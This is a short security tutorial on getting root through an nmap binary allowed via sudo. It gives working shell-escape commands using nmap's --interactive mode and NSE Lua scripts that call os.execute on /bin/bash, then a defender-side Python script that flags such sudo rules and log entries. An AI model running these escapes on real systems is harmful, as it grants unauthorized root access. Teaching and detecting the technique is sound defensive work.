πŸ—ΊοΈNMAP Exploitation

Nmap is a network scanner with OS detection. If it is misconfigured so that it can be run through "sudo" (or as "administrator"), this can lead to privilege escalation.

Exploit 1

Run sudo -l

The -l flag lists all the commands the current user is allowed to run with sudo; look for nmap in that list.

Or

  • Run sudo nmap --interactive or nmap --interactive

  • !bash or !sh

  • whoami

The shell you get runs as root.

Exploit 2

Same as above, but this time --interactive is not available (newer Nmap releases no longer ship it), so we need to use the script engine instead.

  • TF=$(mktemp)

  • echo 'os.execute("/bin/bash")' > $TF

  • sudo -u root nmap --script=$TF

Or

  • echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

We are now root. This works because --script loads an NSE (Lua) script, and Lua's os.execute runs the given command with the privileges nmap itself was started with, here root.
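From the defender's side, the fix is simply not to grant nmap through sudo, and to alert when it is invoked that way. The following is an added example (not part of the original write-up) that audits `sudo -l` output for nmap rules and scans sudo log lines for the --interactive and --script escapes described above; all sample input is constructed.

```python
# Added defender-side example: flag `sudo -l` rules granting nmap as root and
# sudo log entries where nmap ran as root with --interactive or --script.
import re
import shlex

SUDO_LOG_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<target>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$")
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

def nmap_escape_reason(cmd):
    """Why this nmap command line can yield a shell as the run-as user, else None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "nmap":
        return None
    for arg in argv[1:]:
        if arg == "--interactive":
            return "--interactive spawns a shell via !sh"
        if arg == "--script" or arg.startswith("--script="):
            return "--script runs NSE Lua, which can call os.execute"
    return None

def risky_sudo_nmap_runs(log_lines):
    """(user, reason) for each logged sudo run of nmap as root using an escape."""
    hits = []
    for line in log_lines:
        m = SUDO_LOG_RE.search(line)
        if m and m.group("target") == "root":
            reason = nmap_escape_reason(m.group("cmd"))
            if reason:
                hits.append((m.group("user"), reason))
    return hits

def nmap_rules_in_sudo_l(sudo_l_output):
    """Lines of `sudo -l` output that let nmap run as root (or ALL)."""
    flagged = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m and m.group("runas").split(":")[0].strip() in ("root", "ALL") \
                and re.search(r"(^|/|\s)nmap(\s|$)", m.group("cmds")):
            flagged.append(line.strip())
    return flagged

# Constructed samples: a `sudo -l` listing and three auth.log-style sudo entries.
SAMPLE_SUDO_L = "User alice may run the following commands on host1:\n    (root) NOPASSWD: /usr/bin/nmap\n    (root) /usr/bin/less"
SAMPLE_LOG = [
    "Jan 10 12:00:01 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/nmap --script=/tmp/tmp.Ab12",
    "Jan 10 12:00:05 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/nmap -sV 192.0.2.5",
    "Jan 10 12:01:00 host1 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/nmap --interactive",
]
```

The second log line (a plain scan) is deliberately not flagged, so the check keys on the escape flags rather than on nmap alone.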
